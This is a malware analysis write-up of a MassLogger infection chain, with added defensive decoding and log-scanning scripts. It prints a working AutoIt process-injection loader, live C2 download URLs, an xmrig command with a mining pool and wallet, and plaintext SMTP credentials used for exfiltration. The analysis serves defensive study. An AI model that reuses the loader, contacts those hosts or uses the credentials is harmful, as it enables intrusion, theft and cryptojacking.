
MassLogger Malware Analysis
MassLogger is an information-stealing malware designed to capture credentials, keystrokes, and clipboard data from victims. It has been gaining prevalence in the threat landscape, with campaigns of various sizes and victimology observed worldwide. (Yes, I copied this from Broadcom lol)
Anyway, as usual I was browsing MalwareBazaar, looking for fresh malware, and the one that caught my eye was a MassLogger-tagged batch file.

There are more example MassLogger executables uploaded by lowmal3, but I chose this one to analyze because the others were almost the same, and some of them were .NET executables, which is an old technique used by MassLogger.
Malware Flow
This is the malware flow I created while analyzing the sample:

Note: To be clear, all these executables are injected into different legitimate applications and executed as new threads. I don't want to repeat this every time.
Initial Analysis
At the top, you can see a binary file named "sqNnY.bin" - this will be our main target in this analysis. But first, I want to explain what the other exe files do.
Starting with the decrypted "aLlTeucWnrhechxHC.bin", it first checks for debuggers and performs simple VM detection (it's too easy to detect and bypass).
Next, an "installer" is downloaded and executed. It drops new files and executes the au3 file. The last au3 file was the most obfuscated one, but it's not really difficult to deobfuscate:
#cs
$vkkiihtobf = \nwekwowlwhwcogczoft
$nticu = C:\Windows\System32\charmap.exe
$cwipirw = kernel32.dll
$gsnfwdmcztclwcovhkqgi = OpenProcess
$gdixmilpmsosbp = VirtualAllocEx
$jecokuozjfa = WriteProcessMemory
$nhybphxljwzq = CreateRemoteThread
$rjhkweazp = CloseHandle
$fosxprdysmayinrykddwmelktkhpm = handle
$zixjs = dword
$xkitfxhddsbtsyuxw = bool
$lbcideknmrnsazvfazvjqox = ptr
$gbjoxnfcmfxrj = ulong_ptr
$gejrlpqkrcxnxubmbxdu = struct*
$buwqyl = dword*
$gvbdvltraydirvkh = byte[
$kplaadznpnfjmbmdfevat = ]
$mbklctvdfrnfgjakgsbqgx = 0x1F0FFF
$hnxremrogwsdjpoags = 0x3000
$invhvdcuydydlonc = 0x40
#ce
; Read the encrypted payload "nwekwowlwhwcogczoft" from the script directory
Global $pjbhqshpkkrdxsjiyzikstcp = FileOpen(@ScriptDir & $vkkiihtobf, 16)
Global $ewwhytiyydkuc = FileRead($pjbhqshpkkrdxsjiyzikstcp)
FileClose($pjbhqshpkkrdxsjiyzikstcp)
Global $mkzfc = BinaryLen($ewwhytiyydkuc)
If $mkzfc = 0 Then Exit
; Copy the payload into a byte[] struct and XOR every byte with 185 (0xB9)
Global $mleqiqnnnbwglgehhkicmgaklppajh = DllStructCreate($gvbdvltraydirvkh & $mkzfc & $kplaadznpnfjmbmdfevat)
DllStructSetData($mleqiqnnnbwglgehhkicmgaklppajh, 1, $ewwhytiyydkuc)
For $rpmvy = 1 To $mkzfc
    DllStructSetData($mleqiqnnnbwglgehhkicmgaklppajh, 1, BitXOR(DllStructGetData($mleqiqnnnbwglgehhkicmgaklppajh, 1, $rpmvy), 185), $rpmvy)
Next
; Start the hidden host process (charmap.exe) and open it with PROCESS_ALL_ACCESS (0x1F0FFF)
Global $yapoagjwmurj = Run($nticu, "", @SW_HIDE)
Global $lshbtrvzmznfktftandgtxfwse = DllCall($cwipirw, $fosxprdysmayinrykddwmelktkhpm, $gsnfwdmcztclwcovhkqgi, $zixjs, $mbklctvdfrnfgjakgsbqgx, $xkitfxhddsbtsyuxw, False, $zixjs, $yapoagjwmurj)[0]
; VirtualAllocEx: MEM_COMMIT (0x3000) + PAGE_EXECUTE_READWRITE (0x40), then WriteProcessMemory of the decrypted buffer
Global $ynvhvx = DllCall($cwipirw, $lbcideknmrnsazvfazvjqox, $gdixmilpmsosbp, $fosxprdysmayinrykddwmelktkhpm, $lshbtrvzmznfktftandgtxfwse, $lbcideknmrnsazvfazvjqox, 0, $gbjoxnfcmfxrj, $mkzfc, $zixjs, $hnxremrogwsdjpoags, $zixjs, $invhvdcuydydlonc)[0]
DllCall($cwipirw, $xkitfxhddsbtsyuxw, $jecokuozjfa, $fosxprdysmayinrykddwmelktkhpm, $lshbtrvzmznfktftandgtxfwse, $lbcideknmrnsazvfazvjqox, $ynvhvx, $gejrlpqkrcxnxubmbxdu, $mleqiqnnnbwglgehhkicmgaklppajh, $gbjoxnfcmfxrj, $mkzfc, $lbcideknmrnsazvfazvjqox, 0)
; CreateRemoteThread on the written buffer, then close both handles
Global $zsingslima = DllCall($cwipirw, $fosxprdysmayinrykddwmelktkhpm, $nhybphxljwzq, $fosxprdysmayinrykddwmelktkhpm, $lshbtrvzmznfktftandgtxfwse, $lbcideknmrnsazvfazvjqox, 0, $gbjoxnfcmfxrj, 0, $lbcideknmrnsazvfazvjqox, $ynvhvx, $lbcideknmrnsazvfazvjqox, 0, $zixjs, 0, $buwqyl, 0)[0]
If $zsingslima Then DllCall($cwipirw, $xkitfxhddsbtsyuxw, $rjhkweazp, $fosxprdysmayinrykddwmelktkhpm, $zsingslima)
DllCall($cwipirw, $xkitfxhddsbtsyuxw, $rjhkweazp, $fosxprdysmayinrykddwmelktkhpm, $lshbtrvzmznfktftandgtxfwse)
The comment section was added by me, and I removed other decryption parts to make it clear. This au3 script will execute our last exe file named "nwekwowlwhwcogczoft".
C2 Component Analysis
"nwekwowlwhwcogczoft" is a simple C2 that can perform three operations: "exit", "update", and "stealer".
Simple and Clear Flow:
- Checks if the "Software\rub" registry key exists. If not, tries to download "http://176.98.187.46:1778/stealer"
- Checks if the size of "stealer" is more than 1,000,000 bytes. If yes, executes it; otherwise, passes
- If "Software\rub" wasn't created, creates it
- Checks if a file named "paygab" exists in %LOCALAPPDATA%. If so, XORs it with "0x60" and executes it
- If "paygab" doesn't exist, downloads "http://176.98.187.46:1778/miner" and executes it
- The miner checks if "sigverif.exe" is running. If so, terminates it
- Opens a new "sigverif.exe" process, allocates space, and writes the open-source project xmrig to enable mining
- Executes the command:
C:\\Windows\\System32\\sigverif.exe --algo=rx/0 --url=gulf.moneroocean.stream:10001 --user=47GrvVWRXX9CbpQ7WKAqR1fP1fEYJpurvj8pAkF8FcgcUJTFi5KpTAmWxv4modTHTMNXZXSxa8K8SijdVHDiAUs69xgSt MY --pass=x --threads=2"
Note: This is a new malware sample, as I was the first person to submit this sample to VirusTotal and Malware Bazaar
- Going back to "nwekwowlwhwcogczoft", after attempting these operations, it checks the machine's status using the InternetOpenUrl API with "http://176.98.187.46:1778/heartbeat?userID=xxxx-xxxxx-xxxxx-xxxx" (userID is your machine's GUID fetched from the registry) and uses the InternetReadFile API to check for new commands from the C2. As mentioned, there are three commands: "stealer"/"custom" (same thing), "exit", and "update"
- Why would the C2 issue "stealer"/"custom" again? Because the "stealer" downloaded earlier was a decoy: its size was below the required threshold, so it was never executed (Why do this? To keep the real project hidden)
- The other two commands, "exit" and "update", are self-explanatory
Possible Attack Scenarios:
- The fake stealer is designed to waste time for reverse engineers/malware analysts
- It only serves the real stealer to trusted (real victim) machines, selected by their behavior. For example, while analyzing I behaved differently from a normal infected machine: I requested the files several times without ever checking the heartbeat, etc. The attacker can then choose which machines receive the real stealer (the most realistic scenario)
This concludes the analysis of the "nwekwowlwhwcogczoft" executable.
Main Payload Analysis
The real deal was actually "sqNnY.bin". Ironically, I initially thought this was junk code to waste our time, but it's actually the main component of the malware. After XORing it with the key, even when you check the file type, it says "not a PE file." There's also no "MZ" signature at the first two bytes of the file.
After some OSINT research, I discovered that the pe_to_shellcode project was used for this transformation - a free but powerful tool.
"The goal of this project is to provide a possibility to generate PE files that can be injected with minimal effort. It is inspired by Stephen Fewer's ReflectiveDLLInjection - but the difference is that with pe2shc you can add the reflective loading stub post-compilation. Also, the header of the PE file is modified in such a way, that you can start executing the injected buffer from the very beginning - just like you would do with a shellcode. It will automatically find the stub, and continue loading the full PE."
The point is, it makes zero sense when you look at the file - it's just a bunch of bytes. There's literally not a single string, not even "This program cannot be run in DOS mode" (because it's shellcode, not PE). However, it's possible to manually extract the malware. It wasn't that difficult since I could find some APIs used by the shellcode, like VirtualAlloc, memset, etc.
I was able to extract the malware and check it on VirusTotal. I was the first person to submit this sample as well: Malware Bazaar and VirusTotal
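To make the two decoding steps above reproducible, here is an added Python helper (my code, not the author's tooling and not part of pe2shc) that undoes the AutoIt loader's per-byte XOR with key 185 and then carves a PE image whose leading "MZ" bytes have been overwritten. It assumes only what the post shows: the loader's XOR key, and a pe2shc-style header where the bytes before e_lfanew (offset 0x3C) were replaced but e_lfanew itself still points at the "PE\0\0" signature. Instead of searching for "MZ", it trusts e_lfanew at every offset and validates the NT header behind it, so it also finds images embedded after filler bytes. The sample blob it runs on is constructed, not the real "sqNnY.bin".

```python
import struct

XOR_KEY = 185               # single-byte key from the AutoIt loader's BitXOR(..., 185)
DOS_MAGIC = b"MZ"
PE_MAGIC = b"PE\x00\x00"
KNOWN_MACHINES = {0x014C: "i386", 0x8664: "x86-64"}   # IMAGE_FILE_MACHINE_* values


def xor_decode(data: bytes, key: int = XOR_KEY) -> bytes:
    """Undo the loader's per-byte XOR (symmetric, so it also encodes)."""
    return bytes(b ^ key for b in data)


def find_headerless_pe(blob: bytes) -> list:
    """Locate PE images even when the 'MZ' magic has been overwritten.

    For every offset, read the e_lfanew field a DOS header would carry at
    +0x3C and check that it points at 'PE\\0\\0' followed by a known
    machine type. Returns [(offset, machine_name), ...]."""
    hits = []
    for off in range(0, len(blob) - 0x3F):
        e_lfanew = struct.unpack_from("<I", blob, off + 0x3C)[0]
        nt = off + e_lfanew
        if e_lfanew < 0x40 or nt + 6 > len(blob):
            continue
        if blob[nt:nt + 4] != PE_MAGIC:
            continue
        machine = struct.unpack_from("<H", blob, nt + 4)[0]
        if machine in KNOWN_MACHINES:
            hits.append((off, KNOWN_MACHINES[machine]))
    return hits


def carve_and_repair(blob: bytes, offset: int) -> bytes:
    """Cut the image out of the blob and restore the two magic bytes so that
    ordinary PE tooling accepts it; the stub bytes that replaced 'MZ' are dropped."""
    return DOS_MAGIC + blob[offset + 2:]


def analyze(encoded: bytes) -> list:
    """Decode a blob and return [(offset, machine, repaired_image), ...]."""
    plain = xor_decode(encoded)
    return [(off, mach, carve_and_repair(plain, off)) for off, mach in find_headerless_pe(plain)]


def build_constructed_sample() -> bytes:
    """Constructed stand-in for the dropped blob: 16 bytes of filler, a DOS
    header whose 'MZ' was replaced by a jump opcode, and an NT header with the
    i386 machine type, all XOR-encoded with the loader's key."""
    dos = bytearray(0x80)
    dos[0:2] = b"\xE9\x00"                      # stub jump instead of 'MZ' (constructed)
    struct.pack_into("<I", dos, 0x3C, 0x80)     # e_lfanew -> NT header right after the DOS header
    nt = PE_MAGIC + struct.pack("<H", 0x014C) + bytes(18)
    plain = b"\x90" * 16 + bytes(dos) + nt
    return xor_decode(plain)


if __name__ == "__main__":
    for off, mach, image in analyze(build_constructed_sample()):
        print(f"PE candidate at offset {off:#x} ({mach}); repaired header starts with {image[:2]!r}")
```

Run it against the real blob by replacing `build_constructed_sample()` with the file contents; every candidate it reports can then be written out and checked on VirusTotal or opened in a .NET decompiler, as the post does.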

It's a .NET 32-bit executable with zero encryption. The funny part is that the malware developers chose this as their signature:

Final Payload Capabilities
Since it's not encrypted or obfuscated, I'll simply list what it can do:
- Expiration Check: Checks whether the user (victim) has expired by comparing the current time to "2025-02-15" (exits if expired)
- Placeholder Functions: Runs through three empty functions, probably not implemented by the malware developer yet:
  UltraSpeed.Taskmgr_Disabler();
  UltraSpeed.CMD_Disabler();
  UltraSpeed.Registeries_Disabler();
- Data Theft: Attempts to steal data from these browsers:
Chrome_Speed, Torch_Speed, CocCoc_Speed, QQ_Speed, xVast_Speed, QIPSurf_Speed,
Microsoft_Speed, Chromium_Speed, Blisk_Speed, Brave_Speed, Nichrome_Speed,
Kometa_Speed, Superbird_Speed, Opera_Speed, Comodo_Speed, Cent_Speed,
Chedot_Speed, Ghost_Speed, Iron_Speed, UC_Speed, BlackHawk_Speed, Citrio_Speed,
Uran_Speed, Falkon_Speed, Sputnik_Speed, CoolNovo_Speed, Chrome_Canary_Speed,
Sleipnir_Speed, Kinzaa_Speed, Amigo_Speed, Epic_Speed, e360_English_Speed,
e360_China_Speed, Vivaldi_Speed, Xpom_Speed, orbitum_Speed, Iridium_Speed,
SevinStar_Speed, Outlook_Speed, Foxmail_Speed, FireFox, SeaMonkey, IceDragon,
Thunderbird, FileZilla_Speed, WindowsKey_Speed
- Data Exfiltration: Sends stolen data (usernames and passwords) using these credentials:
private static string Host_Sender = "voiper@tamre.it";
private static string Host_Password = "KFRKgMrNoiIF";
private static string Host_Server = "mailserver12.vhosting-it.com";
private static string Host_Receiver = "remiset@remisat.com.uy";
private static string Host_Port = "465";
The exfiltrated data includes PC information, client name, date/time, IP address, and country information along with the stolen credentials.
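As an added defensive example (my code, not the author's, and the log lines are constructed), the indicators documented in this post can be turned into a simple log scan: the C2 endpoints on 176.98.187.46:1778 ("/stealer", "/miner", "/heartbeat?userID=..."), the "Software\rub" marker key, xmrig running inside sigverif.exe, and the SMTP server on port 465 used for exfiltration. The log formats (proxy "dst=/url=", a process line with "proc=/cmd=", a "reg=" line) and the HKCU hive in the registry sample are assumptions; adapt the regexes to your own telemetry.

```python
import re
from urllib.parse import urlparse

# Indicators taken from the analysis above.
C2_HOST = "176.98.187.46"
C2_PORT = 1778
C2_PATH_TAGS = {"/stealer": "c2-stealer-fetch",
                "/miner": "c2-miner-fetch",
                "/heartbeat": "c2-heartbeat"}
EXFIL_SERVER = "mailserver12.vhosting-it.com"
EXFIL_PORT = 465
MINER_POOL = "gulf.moneroocean.stream"
MINER_ARGS = ("--algo=rx/0", MINER_POOL)      # either one in sigverif.exe's command line is enough
HOST_PROCESS = "sigverif.exe"
MARKER_KEY = r"software\rub"                   # hive not stated in the post; matched by suffix

# Assumed log layouts (constructed for this example).
DST_RE = re.compile(r"dst=(?P<host>[^:\s]+):(?P<port>\d+)")
URL_RE = re.compile(r"url=(?P<url>\S+)")
PROC_RE = re.compile(r'proc="(?P<proc>[^"]+)"\s+cmd="(?P<cmd>[^"]*)"')
REG_RE = re.compile(r'reg="(?P<key>[^"]+)"')


def classify(line: str):
    """Return an indicator tag for the line, or None if nothing from the post matches."""
    m = DST_RE.search(line)
    if m:
        host, port = m.group("host"), int(m.group("port"))
        if host == C2_HOST and port == C2_PORT:
            u = URL_RE.search(line)
            path = urlparse(u.group("url")).path if u else ""
            return C2_PATH_TAGS.get(path, "c2-host-contact")
        if host == EXFIL_SERVER and port == EXFIL_PORT:
            return "smtp-exfil-server"
    m = PROC_RE.search(line)
    if m:
        proc, cmd = m.group("proc").lower(), m.group("cmd")
        if proc.endswith(HOST_PROCESS) and any(arg in cmd for arg in MINER_ARGS):
            return "xmrig-in-sigverif"
    m = REG_RE.search(line)
    if m and m.group("key").lower().endswith(MARKER_KEY):
        return "registry-marker"
    return None


def scan(lines):
    """Return [(line_number, tag), ...] for every line that matched an indicator."""
    hits = []
    for n, line in enumerate(lines, 1):
        tag = classify(line)
        if tag:
            hits.append((n, tag))
    return hits


# Constructed sample telemetry: lines 3 and 5 are benign controls.
SAMPLE_LOGS = [
    "2025-01-10T09:00:01 proxy src=10.0.0.5 dst=176.98.187.46:1778 url=http://176.98.187.46:1778/stealer",
    "2025-01-10T09:00:02 proxy src=10.0.0.5 dst=176.98.187.46:1778 url=http://176.98.187.46:1778/heartbeat?userID=xxxx-xxxxx-xxxxx-xxxx",
    "2025-01-10T09:00:03 proxy src=10.0.0.5 dst=example.org:443 url=https://example.org/",
    r'2025-01-10T09:00:04 sysmon proc="C:\Windows\System32\sigverif.exe" cmd="sigverif.exe --algo=rx/0 --url=gulf.moneroocean.stream:10001 --pass=x --threads=2"',
    r'2025-01-10T09:00:05 sysmon proc="C:\Windows\System32\sigverif.exe" cmd="sigverif.exe"',
    "2025-01-10T09:00:06 conn src=10.0.0.5 dst=mailserver12.vhosting-it.com:465 proto=tcp",
    r'2025-01-10T09:00:07 registry op=create reg="HKCU\Software\rub"',
]

if __name__ == "__main__":
    for n, tag in scan(SAMPLE_LOGS):
        print(f"line {n}: {tag}")
```

The miner rule keys on the argument strings rather than on sigverif.exe alone, since the legitimate File Signature Verification tool takes no such arguments; the registry rule matches by suffix because the post does not say which hive holds "Software\rub".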
That concludes this analysis of the MassLogger malware sample.